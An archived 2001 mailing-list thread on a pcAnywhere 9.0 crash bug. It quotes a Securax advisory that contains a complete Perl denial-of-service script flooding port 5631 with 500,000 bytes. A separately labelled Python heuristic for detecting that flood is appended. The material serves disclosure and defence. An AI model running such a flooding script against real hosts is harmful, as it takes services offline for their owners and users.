Vulnerability Development mailing list archives
Re: Symantec pcAnywhere 9.0 DoS / Buffer Overflow
From: Shashi Dookhee <shashi () TRAFFIC CO UK>
Date: Thu, 15 Feb 2001 01:47:10 +0000
I was able to verify this overflow on NT 4.0, with Service Pack 6a.

Thanks

Shashi Dookhee
Head of IT Infrastructure
e-mail: shashi () traffic co uk
**********************************************************************
http://www.traffic.co.uk
Traffic Interactive Limited
191 Old Marylebone Road
London NW1 5DW
Telephone (Direct Line): +44 (0)20 7298 8222
Telephone (Switchboard): +44 (0)20 7298 8200
Facsimile: +44 (0)20 7298 8201
ISDN: +44 (0)20 7298 8299
**********************************************************************
Traffic Interactive is a full service new media agency helping clients maximise their brand communications across all interactive digital platforms. We offer consultancy, strategic development, web site design, production & programming, on-line marketing & advertising.
**********************************************************************
Privileged/Confidential Information may be contained in this message. If you are not the addressee indicated in the message (or responsible for the delivery of the message to such person), you may not copy or deliver this message to anyone. In such case, you should destroy this message and kindly notify the sender by reply e-mail. Please advise immediately if you or your employer does not consent to Internet e-mail for messages of this kind. Opinions, conclusions and other information in this message that do not relate to the official business of Traffic Interactive Limited shall be understood as neither given nor endorsed by them.
Traffic Interactive Limited. Registered in England. Registered Number 3164767.
**********************************************************************

On Mon, 12 Feb 2001, Eddie Harari wrote:
Hi,

I could not repeat this Overflow on a Win2K. Just Thought you would like to know ...

-----Original Message-----
From: Zoa_Chien [mailto:zoachien () SECURAX ORG]
Sent: Monday, February 12, 2001 1:22 AM
To: VULN-DEV () SECURITYFOCUS COM
Subject: Symantec pcAnywhere 9.0 DoS / Buffer Overflow

=============================================================================
Securax-SA-14 Security Advisory belgian.networking.security Dutch
=============================================================================
Topic: Symantec pcAnywhere 9.0 DoS / Buffer Overflow
Announced: 2001-02-08
Affects: Symantec PcAnywhere 9.0 on Microsoft Windows 98 SE
=============================================================================
Note: This entire advisory has been based upon trial and error results. We can not ensure the information below is 100% correct being that we do not have any source code to audit. This document is subject to change without prior notice. If you happen to find more information / problems concerning the below problem or further variants please contact me on the following email incubus () securax net, or you can contact info () securax org.

I. Problem Description
-----------------------
Symantec PcAnywhere is a program that will allow others (who are authorised to have access :)) to use your pc. It's similar to a Windows NT 4.0 terminal server. PcAnywhere (when it's configured to 'be a host pc') listens on 2 ports, 5631 (pcanywheredata, according to nmap) and 65301 (pcanywhere). And when a user sends certain data in a particular way, pcAnywhere will crash.

When a large amount (it depends, sometimes the host will go down with 320k characters, sometimes you will have to send 500k bytes of data) is sent to a 'waiting' host on the pcanywheredata port, "AWHOST32.EXE" will crash, give an error on the screen, and write the "Unexpected program error" to a logfile (with EAX, EBX, ... so read them, you'll find the yummy 0x61616161). Oh yeah, don't use uppercase characters, as PcAnywhere won't crash on them.

Why no exploit, just a lame Denial of Service?
1.) because I suck in win32 debugging / overflowing (but i'm reading) /* so if I can overflow win32 progs, i'll code an exploit */
2.) as the amount of data is variable, it's hard to overflow..

The DoS code:

<--bof-->
#!/usr/bin/perl
# Symantec PcAnywhere 9.0 Denial of Service
# -----------------------------------------
# by incubus <incubus () securax net>
# http://www.hexyn.be
#
# http://www.securax.net
# All my love to Tessa.
# Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero,
# Zym0tic, segfault, #securax () irc hexyn be
# Thanks to jurgen swennen, for letting me (ab)use his computer.
#
# this is intended as proof of concept, do not abuse!

use IO::Socket;

$host = "$ARGV[0]";
$port = 5631;

if ($#ARGV<0) {
    print "use it like: $0 <hostname>\n";
    exit();
}

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "damn, ";
print "hello\n";
$buf = "";
for($counter = 0; $counter < 500000; $counter++) {
    $buf .= "\x61";
}
print $socket "$buf\n";
close($socket);
exit();
<--eof-->

II. Impact
----------
If someone exploits this, then Symantec is forced to rename the name of this product to PcAnyoneAnywhere or something... No, seriously, this could lead to a compromise of a system.

III. possible workarounds
-------------------------
This advisory was also sent to Symantec (info () symantec com), we'll see what they do with it...

IV credits
----------
love to Tessa. greetz go out to : f0bic, r00t, Zym0t1c, vorlon, cicer0, tomicron, segfau|t, and so many, many others I forgot...

=============================================================================
For more information   incubus () securax org
Website                http://www.securax.org
Advisories/Text        http://www.securax.org/pers
-----------------------------------------------------------------------------
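A defender-side detection heuristic for the traffic pattern the advisory describes (a single session to the pcanywheredata port, 5631, carrying hundreds of kilobytes dominated by one repeated byte value), added here as an example; it is not part of the thread or of the Securax advisory. The flow tracker, its thresholds and the sample segments are constructed assumptions for illustration.

```python
from collections import Counter, defaultdict

PCANYWHERE_DATA_PORT = 5631          # "pcanywheredata" port named in the advisory
# Advisory reports crashes after roughly 320k-500k bytes; alert below that so the
# session is flagged while the flood is still in progress (threshold is assumed).
VOLUME_THRESHOLD = 256 * 1024
DOMINANCE_THRESHOLD = 0.9            # share of payload made of one byte value


class FlowTracker:
    """Per-session payload statistics; keeps a histogram, not the payload itself."""

    def __init__(self):
        self._bytes = defaultdict(int)      # (src, dst) -> total payload bytes seen
        self._hist = defaultdict(Counter)   # (src, dst) -> byte-value histogram
        self._alerted = set()               # sessions already reported once

    def observe(self, src, dst, dport, payload):
        """Feed one TCP segment's payload; return an alert dict or None."""
        if dport != PCANYWHERE_DATA_PORT or not payload:
            return None
        key = (src, dst)
        self._bytes[key] += len(payload)
        self._hist[key].update(payload)      # iterating bytes yields int values
        total = self._bytes[key]
        if total < VOLUME_THRESHOLD or key in self._alerted:
            return None
        value, count = self._hist[key].most_common(1)[0]
        if count / total < DOMINANCE_THRESHOLD:
            return None
        self._alerted.add(key)
        return {"src": src, "dst": dst, "bytes": total,
                "byte": value, "ratio": count / total}


def scan_segments(segments):
    """Run (src, dst, dport, payload) tuples through one tracker; return alerts."""
    tracker = FlowTracker()
    alerts = []
    for src, dst, dport, payload in segments:
        alert = tracker.observe(src, dst, dport, payload)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample traffic: one short benign session, then a ~500k-byte flood
# of 0x61 ('a') from a second client, delivered in MSS-sized (1460-byte) chunks.
SAMPLE_SEGMENTS = (
    [("10.0.0.5", "10.0.0.9", 5631, b"short benign request")]
    + [("10.0.0.7", "10.0.0.9", 5631, b"\x61" * 1460)] * 343
)
```

Running `scan_segments(SAMPLE_SEGMENTS)` reports the flooding client once, at the segment where its session crosses the volume threshold, and stays silent for the short benign session.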
Current thread:
- Symantec pcAnywhere 9.0 DoS / Buffer Overflow Zoa_Chien (Feb 11)
- <Possible follow-ups>
- Re: Symantec pcAnywhere 9.0 DoS / Buffer Overflow Eddie Harari (Feb 14)
- Re: Symantec pcAnywhere 9.0 DoS / Buffer Overflow Shashi Dookhee (Feb 14)